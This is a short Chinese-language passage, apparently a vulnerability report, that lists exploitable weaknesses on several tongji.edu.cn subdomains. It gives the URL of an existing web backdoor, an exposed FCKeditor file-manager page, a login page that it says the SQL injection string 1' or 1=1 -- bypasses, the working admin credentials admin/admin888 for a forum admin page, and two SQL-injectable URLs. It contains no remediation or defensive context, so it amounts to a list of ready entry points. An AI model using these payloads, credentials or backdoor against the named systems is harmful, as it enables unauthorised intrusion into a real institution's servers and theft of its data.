rt...
1.web后门(2014年的,被人光顾好多次了)
http://bridge.tongji.edu.cn/lpt3.xcc.asp
2.FCK编辑器漏洞
http://dgyj.tongji.edu.cn/FCKeditor/editor/filemanager/connectors/test.html#
3.后台权限绕过漏洞
http://stru-en.tongji.edu.cn/manage/login.asp
使用1' or 1=1 --可以成功登录后台
4.弱口令漏洞
账号密码:admin/admin888
http://mat.tongji.edu.cn/bbs/admin_login.asp
5.SQL注入
1)http://zyxw.tongji.edu.cn/TJPDSYS/InfoDetail.jsp?titleID=555
2)http://cad.tongji.edu.cn/cad/newslist.aspx?id=42